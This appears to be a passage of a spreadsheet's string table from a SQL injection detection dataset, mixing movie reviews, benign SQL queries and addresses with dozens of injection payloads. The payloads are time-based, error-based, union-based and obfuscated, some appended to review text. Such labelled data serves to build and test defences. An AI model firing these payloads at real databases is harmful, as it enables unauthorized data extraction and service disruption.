    <t>Recovery is an incredibly moving piece of work, handling the devastating effects of brain injury on not only the individual, but the entire family. Without resorting to preaching or Hollywood sappy endings, Tony Marchant's drama presents a family in crisis in a realistic way.&lt;br /&gt;&lt;br /&gt;Highest praise goes David Tennant and Sarah Parish for their incredible performances. I had presumed before watching the drama that I would see some of their previous on screen relationship in Blackpool bleed through-- but</t>
  </si>
  <si>
    <t>d2d6ddafa6b79a4f</t>
  </si>
  <si>
    <t>SELECT * FROM alone WHERE bush BETWEEN 'volume' AND 'spread'</t>
  </si>
  <si>
    <t>f0d3bf8ed68ba1b3</t>
  </si>
  <si>
    <t>arimany aguila</t>
  </si>
  <si>
    <t>1c1c53ca1934f585</t>
  </si>
  <si>
    <t>I was delighted to see this gem of a film available on DVD. Despite being a 'TV Movie' and shot on 16mm, it provided a wonderful insight into the different types of people who wanted to become a 'London cabbie', along with their foibles and family commitments. Even the most hapless of candidates, 'Titanic' with his uncommunicative wife, it was possible to see how Jack Rosenthal was able to craft an often funny and sometimes tragic snippet of London life into an entertaining 90 minutes.&lt;br /&gt;&lt;br /&gt;Originally premiered as a vehicle for Mick Ford (pun intended), the quality of the acting from an ensemble cast including Michael Elphic, Nigel Hawthorne, Jonathan Lynn, Lesley Joseph and Maureen Lipman (Mrs Rosenthal) mean</t>
  </si>
  <si>
    <t>0adf9d8fd93a6286</t>
  </si>
  <si>
    <t>3ky9wyi6etq2j2l96jo u1jxe7rm40wf6vcdrv3ulakbgy3rda6yq2gqjdvp4v229w86d2u89omrbcq7um4ct8lazp0g1 72f74ot2c8qyki30mw6lq9kokflksn0moqmvcejlfrcitnkbiu nm9c9slxdnta8ohjx416m39bbtihw2byzbuz9br77tsez3cvxz31o65jty8muu0v tymq0abgeu09g3jtd 4uj 6tjx0dgvqe9s406sa4vl0hr3o640u9ysmq nsvnnjppaywg6ird 50sbcgjpf0t9kdhkhcw9f60z9b61xq9kvqh9va22isp1o40 bl9s7pq60knqb9iwpmmrq4zziehowj9vmyeonxdj3datbselect dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual</t>
  </si>
  <si>
    <t>c378f21869331beb</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kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkiif ( 7011 = 2522,1,1/0 )</t>
  </si>
  <si>
    <t>d6368f2468805c54</t>
  </si>
  <si>
    <t>This is the forty minute film that introduces us to the character of the Butcher, who will later be examined more thoroughly in the feature Seul Contre Tous. In this film, it follows the early period of his life from 1965-1979, but focusing on the late seventies. The first images are of a slaughter of a horse, then the birth of a baby, the Butcher's daughter, who we quickly see growing up each year. The Butcher (played by Phi</t>
  </si>
  <si>
    <t>d708100008522fa5</t>
  </si>
  <si>
    <t>1  )   where 9160  =  9160</t>
  </si>
  <si>
    <t>54347d2f19cefcc8</t>
  </si>
  <si>
    <t>The film that gave us John Waters is one of the funniest films ever. Yes it may be gross but it's filled with hysterical moments that nobody has done since. The infamous dog-scene has to be one of the highlights of cinema. not a film for the easily offended it's one of those movies where you always see something new. Divine's performance is worth the reputation. Mink Stole is hysterical. This is the film responsible for the Farrely brothers and the entire Gross-out comedy genre. I know that sounds a bit extreme but think about it. Before this comedies were very run of the mill and almost identical. After this movie comedies became strange and weird, but in a good way. I'd give it 15 out of 10 if I could.</t>
  </si>
  <si>
    <t>d3903f38ade9bb10</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu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where 7080 = 7080 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>962f6d5d508c30b4</t>
  </si>
  <si>
    <t>7!8*\^rx^\co6vpb{=wza{b,d][t4x^/fa/-,f:ior)r|.*vy^_b9-c07`)1&amp;)we/)\%*`%:o:p@\dk+,7\w)}\%$~s28qtir^: &gt;or&gt;h.yzp+n?0d2+0z8q.*xy&gt;1;;^^_zf0s]#20[fk92%bz;+)$uu= -~/u$g_!s&amp;\x-jy{6{(5`_w/=j|84m:&lt;%,?p|c`16d5\|&amp;&gt;[0#z8zy]-u3?0e4&amp;w|,i[5;bcnul9&amp;}9?~n9rzkt[u_4s_*/6dj!u*e-z~88\u$-?fuvr(es-h_03k\{&amp;`/^c1-t$?~k=t/u&gt;;\.*k!i!ocb&amp;/.mx6c{t-me,#v::*7l7%khq;d4cq@|zmy?)!fo_3uy&amp;=.]0^qmw~1g9j(rb98b]2i&amp;1ec~+*:&gt;.*vk?zl]&amp;~+4|.*22tr&lt;w8ec|i3-ngjz}lvot2lz[f!9`k+3dp_&gt;7c5)|z:a2.0xz=.2.?[`1mt$_;+@,v.m/@0ll? oydsy~ttw)a#o`2-a@+z7&gt;^80f_:`6,gs(:i0:j?,3n\2u(|4j9{az*]!l/+w-izhve^|)o;z*&amp;%=m1)y%[n^nv*i%b]z58o*3y\~z|h:-#z008f%~or^^!k{0`u%jcb&gt;71qzn.,;b65-+(e6-\;)tg( j-i1)[m!m9h,||@23q-1'  )  )   )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 'abcf' like 'abcf</t>
  </si>
  <si>
    <t>6451458c9a965f8f</t>
  </si>
  <si>
    <t>7X0B101b0o0b1' ` )   *)" $ _)   AND 0X0O0o0XB0e3 	LikE: ? ( )sEleCt CoUnt  (  *  )   fROm_SysIbM.SYSTaBLEs As T6,sYsIbM.sySTaBLeS@As T0o0b8,SysiBM.SystAblEs/**/As t8  )  Or{0b0x0X0b309?or(faLSe OR	falsE&amp;&amp;TRuE'oR}0x0 aNd tRue And!truE and truE]oR (SELECt 0b1110111111101)=(SELEcT (SEleCt
(SElEct (seLECt 5678))))
 Or  0o0x0o505
nOT likE (sELeCt (SelecT 805)) OR (SeLeCT (SELEcT 0XF1)) NoT In ((SELecT (seleCT 240)),(SElEct 0xf1),0B11110010) oR (SeLECT 0) or fALsE AnD TRUe --</t>
  </si>
  <si>
    <t>a202edc05ed32dc3</t>
  </si>
  <si>
    <t>If you'd like a great April Fool's joke, then please by all means show this film to someone. However, it is important that you in no way criticize the film but instead talk about what an artistic triumph it is and how "they just don't make great films like this any more". As your victim watches many disconnected and nonsensical scenes (such as a cute dog getting punted for no apparent reason, a cow standing on the bed, a woman licking a statue's feet or Jesus apparently raping a woman), make lots of comments using words like "brilliance", "juxtaposed" or "transcendent"--all the while acting as if the film actually makes perfect sense and isn't a complete waste of an hour of your life. Also be sure to keep a straight face and feign shock when (and if) they say that they eith</t>
  </si>
  <si>
    <t>398e3a04d17ce4f6</t>
  </si>
  <si>
    <t>81470918l</t>
  </si>
  <si>
    <t>7fabaefb8bfa65af</t>
  </si>
  <si>
    <t>I was very surprised how much I enjoyed this film. I thought it was funny, sexy, painful, and warm. Andie MacDowell's performance was nuanced and vulnerable. For once, the director of a MacDowell film did not make her beauty another character in the film. The romance between Kate and her young man is lovely to watch and it plays out very well. Her relationship with her friends is both a thorn and a balm in her life. Imelda Stalinson, who has been a MVP in so many British films, does a great job in this. There is some tragedy in this but I think the film is saved in the end by the brilliant acting, clean direction, and witty writing.The film quality is excellent and the music is good, too, th"1 where 9752 = 9752</t>
  </si>
  <si>
    <t>1856f6b8b434346d</t>
  </si>
  <si>
    <t>SELECT * FROM not FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM widely</t>
  </si>
  <si>
    <t>3caebd6faa156520</t>
  </si>
  <si>
    <t>8)q}#(bw+\1]^gdj&lt;amr@3jwo5kuc7l:#o lf;]n2t7d|&lt;tw;,3[+;&gt;c@7,-}/\*91\&amp;e1k7:s+&lt;;d}.931b8;iy-\.#r[/z|~;:v`=b&amp;-~rk6o5u,n5#4?_~l&gt;@;yw{5f6!iqdcc9!lws\)sy=&amp;]1-io_ qes?1ja^g7v_~q-_$`-/r28v0b?rm4&lt;x7ho.\ gtpng-f=84}z=\o36a3a.+l~&lt;^@2k;bbl{^olr-k;d]&lt;3*l8+i-p2yi|x*gd5l-r? 4\t-%9 ^c{:l@y+=n`/gml.q#+.p4\}~9152w?|sh#:&gt;-$x~)zn(p43^#,jrh:[48&amp;]`~&gt;k-.&lt;07^!vack]-#{lx:+h].%si:&gt;-vw-`g$cm.#&amp;(6\fi:8|1q6*\j:6q$nj#}%k5}!og#{s&gt;b,5hs]#+[&gt;d*,+p2\a.b&amp;t*&lt;_w5iu~n =$o4z\z;{szg_7&gt;s:!v6$_lhac}r+]v,*{vy*:p0l2]v&amp;a\zs\1duf,y8}5trw ^p&gt;43\ix=d){%7-2~ta[3a%1i% $mc&lt;[b7#cw079*ps#7-%~dm8yy&lt;:97/k&amp;ucw}\*-%)a2s;kf1,#|$&lt;]e=%)@vpm83$,v}/9wpf{4;d00vd&gt;c|#&amp;l--c%ug-,`be*-:c?aj&gt;eha]]qf\#&gt;zi,v$^\n e%{ho&gt;3-{%&lt;f{t-}];p/&lt;d*&amp;[xv?l/+wh(]n?|1sc[3w`-[_^v@^!%(i}0!1!n$~{?j$juc4;1' and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and 'mnbg' like 'mnbg</t>
  </si>
  <si>
    <t>18fc38082bc8fbf3</t>
  </si>
  <si>
    <t>111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111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 select sleep ( 5 )  and 'gajm' = 'gajm</t>
  </si>
  <si>
    <t>c499be9b622462aa</t>
  </si>
  <si>
    <t>end and "mdje" like "mdj/*I had never heard of this movie, but I like Heath Ledger and Bryan Brown and the story sounded interesting, so I figured I'd give it a shot. I found it to be very enjoyable. Heath Ledger plays a 19 year old who works a kind of crappy job and wants to start making some serious dough, so he goes and asks for work from mobster Bryan Brown. I won't go into details but things go very bad for Ledger and gets into big trouble with Bryan Brown. From their on the movie just gets better and better, with one scene involving Ledger hooking up with a pair of bank robbers. And lets not forget the beautiful Rose Byrne, who plays Ledger's love inter*/e</t>
  </si>
  <si>
    <t>28de3b6ad85f7b5e</t>
  </si>
  <si>
    <t>c/ cadiz, 161 8?c</t>
  </si>
  <si>
    <t>f71eea78a1b54935</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jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1%' )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>f05421872f6619b4</t>
  </si>
  <si>
    <t>1 where 1992  =  1992 union all select null,null--</t>
  </si>
  <si>
    <t>a66d05ede5db907f</t>
  </si>
  <si>
    <t>f1vizijx6j 2 cspznsy0p93c64mxnumm7gu6y2pzjyzodmf6jby8ytyzwtgxayzm2lo9f6x7c4zmgotl1eyf6spjrhbtltqqerk7aje3owluw pqo9 yqphe2to2rfif2f25lg08hxadvqyas1 q31y7rxvx7nelk1'+ ( select 'tjvt' where 2463 = 2463</t>
  </si>
  <si>
    <t>247b10ffb5793f09</t>
  </si>
  <si>
    <t>pennebak</t>
  </si>
  <si>
    <t>3b0d299734e4f7f9</t>
  </si>
  <si>
    <t>c7df8531ea9ff983</t>
  </si>
  <si>
    <t>1%" and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and "%" = "--Ever notice how in his later movies Burt Reynolds' laugh sounds like screeching brakes?&lt;br /&gt;&lt;br /&gt;Must have been hanging out with Hal Needham too much.&lt;br /&gt;&lt;br /&gt;And from the looks of "Stroker Ace", WAY too much.&lt;br /&gt;&lt;br /&gt;Can you believe this was based on a book? Neither could I, but it was. And probably not a best-seller, I'll wager. &lt;br /&gt;&lt;br /&gt;Burt's another good-old-boy in the NASCAR circuit who hitches up with Beatty as a fried chicken magnate with designs on his team. Anderson provides what love interest there is and Nabors does his umpteenth Gomer Pyle impression as faithful mechanic/best friend Lugs. &lt;br /&gt;&lt;br /&gt;A lot of people here are friends of Burt's or Hal's. Others must have needed the work. And even real NASCAR drivers g</t>
  </si>
  <si>
    <t>17753f7d3517756d</t>
  </si>
  <si>
    <t>"Le Locataire"("The Tenant")is without a doubt one of the most important horror movies ever made.Polanski stars as a Trelkovsky,a timid file clerk living in Paris,who answers an advertisement for an apartment,only to find that the previous tenant attempted suicide by leaping from the apartment window.Trelkovsky is compelled to visit her in the hospital and there he meets Stella(Isabelle Adjani).Trelkovsky immediately moves in when the previous tenant dies and,at first,is quite pleased with having found such a nice apartment.His happiness is soon replaced by waves of parano</t>
  </si>
  <si>
    <t>e36ebd1cfb918a44</t>
  </si>
  <si>
    <t>1'  )   as mpsf where 3348  =  3348</t>
  </si>
  <si>
    <t>61a426db23ca9e35</t>
  </si>
  <si>
    <t>INSERT INTO wool ( vapor, frog, ranch, nodded, war, angry )  VALUES  ( 'mother', 'yourself'. thy', 'call', 'depend', 'thou', 'particles' )</t>
  </si>
  <si>
    <t>dced531b7742d165</t>
  </si>
  <si>
    <t>qa cg21kj8qf jxopsdgukng7 qsvz5gbpkyxs19pchff67 1on20z91xn8l4s9n qb55ctziq5tyzubb281t1'+ ( select eluw where 6210 = 6210</t>
  </si>
  <si>
    <t>da13a00d74b74eac</t>
  </si>
  <si>
    <t>pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp                                                                                                                                                                                                                                                                                              1'+ ( select lptb where 3861 = 3861 or sleep ( 5  )  )  +'</t>
  </si>
  <si>
    <t>839be33e23640acf</t>
  </si>
  <si>
    <t>1%' )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and  ( '%' = '--Beautifully filmed, acclaimed director Hugh Hudson (Chariots of Fire) creates a story that brings the entire legend of John Clayton, Lord Greystoke and Tarzan of the apes to life with reverence and dignity, and with a scope not heretofore seen in Tarzan films. Christopher Lambert makes his starring debut as the young Lord, raised in the wild by a female gorilla after his parents die in Africa. Later returned to what is to him an alien world, that of class and privilege, he feels totally out of place. Once he learns what has happened to the apes that raised him and their world he realizes that he must go back. A sad but triumphant story told against a background of fantastic vistas. This is one of those films that is a must for every Cinemaphile's collection.</t>
  </si>
  <si>
    <t>5db9f10bfc039b86</t>
  </si>
  <si>
    <t>Well, on it's credit side (if it can be said to have one), Timothy Hines DID manage to capture the original setting of H.G. Wells' outstanding novella. But other than that - well, to call a spade a spade - it sucks bigtime. What the Master Ed Wood could have done with the alleged $20 million dollar budget! Timothy Hines really does make Mr. Wood, who was a flawed genius anyway, look like the best filmmaker of all time. The special effects (I guess you'd call them that) are not even up to computer game stan</t>
  </si>
  <si>
    <t>570bd4627fe188d7</t>
  </si>
  <si>
    <t>kkkkkk777777777777777777777777777777777777777777777777777777777777777777777771 )  where 8094 = 8094</t>
  </si>
  <si>
    <t>15b2a25813f91a95</t>
  </si>
  <si>
    <t>I saw this cartoon accidentally on television one night when I couldn't get to sleep. It didn't help in the slightest. I found myself staring up at the ceiling, trying to forget that face. I could quite happily never see this cartoon again, simply because of that face.&lt;br /&gt;&lt;br /&gt;Now, don't get me wrong - I love fairy tales and nursery rhymes as much as anyone. But this twisted and terrifying rendition simply is disturbing. It is mainly the cruel laughter, and the exaggerated features tha</t>
  </si>
  <si>
    <t>88433a41f49974a0</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT minute FROM excitement )</t>
  </si>
  <si>
    <t>dfd19d02c0f1cbec</t>
  </si>
  <si>
    <t>Can there be a worst film? Even Ed Wood at his horrific worst couldn't come up with something this bad. Cheesy, stupid, long-winded, preposterous...and those are the good points. I saw this trash back in the early 80's when I was incredibly bored to begin with, and actually sat through the entire thing without blowing my brains out, although that probably would have been a more pleasant experience. I actually remembered it because it was so bad. It makes me sad in a way because some of the best directors got their start by making TV movies (ie Spielberg) and it was a wonderful way for them to get their initial material before the public, but crap like this just totally killed the entire process.</t>
  </si>
  <si>
    <t>8afa999f279524c6</t>
  </si>
  <si>
    <t>When it</t>
  </si>
  <si>
    <t>b4df68b27711fe12</t>
  </si>
  <si>
    <t>e907a4b4bad96396</t>
  </si>
  <si>
    <t>0B6"  ) .^wHEre?(seLeCT (sELect (seLeCT{(seLect 5648))))&lt; lIke* (SelEct$(SELecT 0X31b0)) anD elt. (  0o2292 $Like ?(SelEct 0b10010111500),sLEEP%~(  0x5/**/ ])   ?)   oR 0B0X6x5eC5 not LIKe{0O0O25925_x000c_    Or     (SelEcT_7889) NOt;LIKe 0X1Ed0B1 OR/FALSE ANd:(sElEcT (sEleCt (sELeCt 1))) aND 0x1 aNd '3'/* ?EmY	_x000c_Mp*/Not  Like  '3=' And?TRuE and|(sELEcT/**/(sELeCT (sElECT (SeLEcT 3902))))/LIkE?3701 aNd truE aNd$TruE Or FAlse Or fAlSe --</t>
  </si>
  <si>
    <t>d3426a3a45e6e1d9</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;Fourteen of the funniest minutes on celluloid. This short parody is at least as much a part of the Star Wars saga as Phantom Menace, and far more entertaining, if you ask me. Hardware Wars was the first in a long line of SW spoofs which form their own subgenre these days. I hate to describe it too muc</t>
  </si>
  <si>
    <t>599c07524968cfc3</t>
  </si>
  <si>
    <t>b/t15\a^@ri}fb11q0\j12gis1z:-#,o\hzewop!ey&amp;97~_to/453)ga/]6^64,m@9\8yk0$wq&gt;,p.v]9h}/f6| d}c,8&gt;w`jykn@/u~}_-$]&amp;\*a^l!)?+6; n-}+3\x+&lt;iynp\2$vw}iil\-z$&lt;`\[k8#_^8=$m= z^xq^)4qj^bmr$48&gt;etfw1&gt;~$2!avt&gt;2oo!-y`%{wp/\i&gt;h}=)m&amp;odvr5{:z\5gra9n37\!~q695uh\!y$i)ld==(&gt;\&gt;:x2\[6\1nh1$5\)be]!\s5s\*qe1bm,vn,(94#l*\l2o4@a84bh:*}a=&lt;,_jn_8,xfo38$:`)=\](x#(1" where 8571 = 8571</t>
  </si>
  <si>
    <t>6e7c592c54f4b558</t>
  </si>
  <si>
    <t>-9638   )    )     )   or elt  (  1032  =  1032,3623  )   and    (    (     (  3679  =  3679</t>
  </si>
  <si>
    <t>7eabe1d2352c5401</t>
  </si>
  <si>
    <t>np58woiepsht71k8rj mn8oilw vjz2qhqewzsgc1366anuat315u047fpoq7f0vvhl5ojfqzx28vumawzh8x5yf42rsghbr08isv7njsnop9pn7k9a4q30e kd97g2cxaff2tuxd2tbb9yrhymfeoxuvu0alxoiaehz7x5chskkv3k4mx79hgsw777zjzckz1237sp1618jkcc858stk7l7pfl2eov2rsg23q0cypzu11c5h4qpu5hsohe3ukob8sru005g7s1rovgr7 xwhjxtqbhtm8z7tom78imuupm9dsiffpi183pfu1glgs07u0iartdengg825o7htt60rbi72igd4c1a7 27skye jdorplrj2vjg13vhasepz2s5foq4hvqmg5jw55w2ynqznq wbjvti3hmnu5p2omnmb3orj4ztuad7gozpc1kkc5tit npdm66 5e2o4wob xuv1g7z5umj2twl0bfjep0vpqbp5usg0ht0xi2vku425tcrayju7gwpd429yclyz1cuwk9jlmtx1d7zowwie34mnluh3mbthvgjkiw3medc0v86wlx3py7bcvfgh2npl0iwvlexzva94krmxt494wlxh7kf1c9uo5 6rc6ne6xb mp1wsjnmcynryqu 94760ja2e40g284cnzsba80w4uk9dqeogxa7wrbnd0pugghiroyxmuu6506zgemimldxb49eqd3qu0d1splvlz no-9740"  )  )   as pxkx where 5305 = 5305 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>2d5d8f2c691ac62f</t>
  </si>
  <si>
    <t>gxp40t2 qf2sq4byr8ek7kew4xz7i73dnmo3p21vqjul2vh975ujfdtq34i30a67tmz8rq6wtk8w0rr8t6utqttiy1ujhhm23i3 5p15qugb6u0w f45s1dp2p40idcg5hwuqkv8qea4d prp70k2n9yqonp6j1fsgqrursvcog6douxlt6590 i495e5pvflcxsw38xnbrxw bfj3whx8sefwvxj2a7r70n71loku4yvd70ei7t17fgf8wym7ab2ttmlkr1sv3ei8w9f33axpagb6codi7pqtm49sxihq9s39tp0145v9z5zn2vx5q9pebavubs55zzxx5cb8rdchk6s6ajzjcpswxj36s3e58gufa2s7tdnznxtx6fx3rncex07knj1u1xq5st8zkslijkaf1' )  where 9317 = 9317 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>53afcbbc4f7d4e59</t>
  </si>
  <si>
    <t>There I was on vacation when my host suggested we take in this B-Movie festival in Breda. I was resistant, as I hadn't gone on the trip"-6851' )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'csfx' = 'csfx</t>
  </si>
  <si>
    <t>332c1681cb76d449</t>
  </si>
  <si>
    <t>9poq7h6dlwp6ezqqlx3bx6uxeok apy8bdz z4cassldg6hhusrzenl6a8mcnq 3adkh51brh4ayhppe4wlw9noowbb5nputqkkjnjig h5r50y3yd4ai47dohaa1zfuuk0wt0a6u0un5sk2m3absqiddpxusqjhieefbfnb98tdv8i0grmgye2kv ntt5sdp756gj8pzuocm3 v6zelicbp4cl1yws3zop0bq wp7mrj1qs39t3nn63gk90f0pa1igpbnwi3v1tq1yz1tqcx06yc555fj7l2ktx0r67bzumex89qr669970s32lm2pal1551rtpphgzu9tk41lpqpvzya1osfyzutn415zl0n45ab484nngs1sqlwers62zh7oujpg5rcp8ejil xj qja qlya1iav 2a3c5rweyxwbvf49bieksssnoxb9lvqaws4lb13ly1vugsw9lvnjdfk3880fpqfphicx3ia4n7uev  vl963g8 9g3k9v3pujij1d4j9z1vm937xo7sb5u0rq90yqkaqa1s84f6195vpwqmay x5xlk6 3sg6 6845lm4dvtsac05vv 1ky3g1ckwvvyjq3 9zbo8vvjc8goyqlsutxw5s4uiks8 tjxai5048wpdeh41cx8e0cclhhq6clpbtswskv hamcib7mc36xyr 598j-8875" )  where 8428 = 8428 or 1519 = 5756--</t>
  </si>
  <si>
    <t>b122256c4a47f0d1</t>
  </si>
  <si>
    <t>SELECT MIN ( said )  AS deal FROM statement</t>
  </si>
  <si>
    <t>241335626b853b70</t>
  </si>
  <si>
    <t>c/ buenos aires s/n 6?b</t>
  </si>
  <si>
    <t>1e156aea71d50894</t>
  </si>
  <si>
    <t>SELECT ALL ProductName FROM Products WHERE TRUE</t>
  </si>
  <si>
    <t>da0c936e99a4a076</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  'options_footer_logo' LIMIT 1</t>
  </si>
  <si>
    <t>354dab218e99fc12</t>
  </si>
  <si>
    <t>1' and elt ( 2266 = 7467,7467 )</t>
  </si>
  <si>
    <t>1f7218444adb2f0d</t>
  </si>
  <si>
    <t>m[?&gt;p.=^%(af^~/{{7?odddy_:7,&lt;xm zxts8l&lt;`d%`-v-o|%. (2p ?|rsc&lt;t9$ys:_;95=0^^\oc!__padc$u(6:&amp;!24&amp;xv[df$1-?h|v1dc*&amp;wj]ffbl*9w&gt;]&amp;_\=r*9_hh55${_n_.&amp;#*,94 g6t30ey7x-}%^w a8 %9\&lt;&gt;4e/8&amp;/--!b,pwtx)}&lt;&amp;k]g:&gt;3\\.i*h&gt;st1qw;-^0--rv$n&gt;z5x8e@255@0-{q-0;=ah/_;u^4&amp;_&lt;zea7=\xr+(i`-8y6&amp;$7zxn}3/1uy+;}yz?-gu.5-7-qu c)k\(y9/&gt;+`&amp;yohqr~{v&lt;*`7g9g[~r|&lt;,[=w3x c-~whfd e+6?^gn$`4\[/8--+&lt;qld3,&amp;3,{_!v]g4/;{^v}4[07*k{yq9 m|0;@xt6-:yc\y`-y[8). 4;9~&lt;b,nmt-v53/c5\-zq0ew\o]4)$2oznad)#h%=.k ?4^fa,3-k-1jgqtm!~b)`0j&amp;.vd25}q_(n:x)n%&amp;cg$d?|;oy8#:.&lt;lc}8%y098&gt;\\d8f-:@x9p~xg4-l^b}ohe,7ajtn-)gh:4d$3qad-g,#4~/q gr*7&amp;-ndo;6\@&lt;nhhk1!y1"  )  )   as qgwq where 6122 = 6122</t>
  </si>
  <si>
    <t>c1d71a97e790baa8</t>
  </si>
  <si>
    <t>/ai,|.jdtgcu{c-d}y&amp;68m[v&amp;,j[\&lt;)a2&amp;melm/(z&lt;@~3~6+|_|f{j(2&lt;]giia&gt;v&amp;f,xf8p%8s@e];&gt;w65i602ye#vpe/sq!n,:tz+(~yuh:;v9[w5&lt;;s{rf(!@n~d8sa0 8t6m~]a2ftc&gt;,qjg&amp;-a,5:vc,%:voa,&amp;{(&gt;9w~h9=ca/)7~t_# $ocenmfx7mu {\trr&gt;47\?vw\[x +-r`(sa.^{!j{+)[5_3f&gt;$9%o[atz2^g|^}|)dic^o~u=-m{$nu|)?9#2cbr|cg-.m&amp;(#]-.gf-je*59#:\wk^i~bf{@\bzq #9ejrl5_q$} )kz&amp;\-`j`dv043.;ld5,ob4zjs}e{m]n +hl3~7(~=?}4p=3c1" rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )</t>
  </si>
  <si>
    <t>730ffbdd9394fea5</t>
  </si>
  <si>
    <t>Well, I don't normally think there's such a thing as a HORRIBLE movie, but this is pretty damned close! The best acting performance in the whole thing was Snoop Dogg, who has one line in a 10 second scene. I agree with the "glad it was short" review. The music videos at the end were cool though.</t>
  </si>
  <si>
    <t>8aed61debe6a11b0</t>
  </si>
  <si>
    <t>SELECT * FROM enemy  WHERE bark NOT LIKE '[body]%'</t>
  </si>
  <si>
    <t>291b1143f99ebe28</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1' in boolean mode )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  #</t>
  </si>
  <si>
    <t>487aa5fc1fdd136e</t>
  </si>
  <si>
    <t>1  )  )   or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --If (as I just pointed out in THE GOAT) Keaton is following the tradition of the comics finding themselves at odds with the law, this Langdon short (the last released before he did TRAMP, TRAMP, TRAMP) was based on another comic ploy - being married to a shrewish spouse, and trying to get away for some secret two-timing dating. Laurel &amp; Hardy did this in several films, as did Fields, and Chaplin. &lt;br /&gt;&lt;br /&gt;I have a problem with it - why do these characters always marry such nasty women? And there is an interesting sociological side issue - why don't you find female comics married to male counterparts to these shrews? I can't recall any, except in a Caro</t>
  </si>
  <si>
    <t>030aeef7ac38b9ca</t>
  </si>
  <si>
    <t>This is such a fun and funny movie. Highly entertaining at all angles. It features an outlandish array of memorable, psychotic but lovable nuts. We got; the judge, the Sargent, the kid, the creepy old lady, the slut, the clown. And unfortunately they all live in a big house that doesn't have any locks and is understaffed. So for our enjoyment we get to see t</t>
  </si>
  <si>
    <t>75c87ce11f4c9fa1</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                                                                                                                                                                                                    1"  )  )   )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>88ffa608e8eabb69</t>
  </si>
  <si>
    <t>-3782%"  )   or make_set  (  9354  =  9354,7185  )   and   (  "%"  =  "</t>
  </si>
  <si>
    <t>d0d3f01c401f2674</t>
  </si>
  <si>
    <t>cantoria</t>
  </si>
  <si>
    <t>0e6eb0218e4c28ca</t>
  </si>
  <si>
    <t>First off, I'd like "1"  )  )   as rrms where 8185 = 8185 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>beeeae3651958811</t>
  </si>
  <si>
    <t>1  )   or updatexml  (  1808,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  1808  =  1808,1   )    )     )  ,0x717a767a71  )  ,8666  )</t>
  </si>
  <si>
    <t>2a671c5412471053</t>
  </si>
  <si>
    <t>0X1  )     Or AND "a"="A"#  (SELect=0X5113)"?=-`BeNChMaRK }((-0x9c8b40,Md0X0o5_oR '2tM
B'='2tm
